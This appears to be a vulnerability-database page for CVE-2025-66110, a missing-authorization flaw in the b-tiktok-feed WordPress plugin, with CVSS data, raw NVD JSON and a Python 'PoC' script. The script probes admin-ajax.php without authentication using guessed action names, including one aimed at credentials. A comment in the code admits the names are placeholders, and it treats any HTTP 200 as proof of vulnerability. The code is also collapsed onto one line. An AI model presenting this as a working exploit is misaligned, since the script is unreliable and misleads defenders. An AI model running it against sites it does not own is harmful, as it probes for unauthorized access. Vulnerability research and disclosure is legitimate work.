Security Vulnerability Report
中文
CVE-2025-66110 CVSS 5.3 MEDIUM

CVE-2025-66110

Published: 2025-11-21 13:15:53
Last Modified: 2026-04-27 18:16:36

Description

Missing Authorization vulnerability in bPlugins Tiktok Feed b-tiktok-feed allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tiktok Feed: from n/a through <= 1.0.23.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

b-tiktok-feed插件 <= 1.0.23(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-66110 PoC - Missing Authorization in b-tiktok-feed # Target: WordPress site with vulnerable b-tiktok-feed plugin (<=1.0.23) def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-66110 This PoC attempts to access a protected endpoint without authentication """ # Common WordPress AJAX endpoint ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Try to access plugin's protected functionality # Replace 'action_name' with actual vulnerable action vulnerable_actions = [ 'b_tiktok_feed_get_config', 'b_tiktok_feed_save_settings', 'b_tiktok_feed_fetch_data', 'b_tiktok_feed_get_credentials' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded' } print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-66110 - Missing Authorization in b-tiktok-feed") for action in vulnerable_actions: data = {'action': action} try: response = requests.post(ajax_endpoint, data=data, headers=headers, timeout=10) # Check if response indicates successful unauthorized access if response.status_code == 200: print(f"[!] Potential vulnerability found with action: {action}") print(f"[*] Response preview: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Error testing {action}: {str(e)}") print("[*] No obvious vulnerability detected (manual verification recommended)") return False if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] check_vulnerability(target) else: print("Usage: python poc.py http://target.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66110", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:52.660", "lastModified": "2026-04-27T18:16:36.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in bPlugins Tiktok Feed b-tiktok-feed allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tiktok Feed: from n/a through <= 1.0.23."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/b-tiktok-feed/vulnerability/wordpress-tiktok-feed-plugin-1-0-22-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}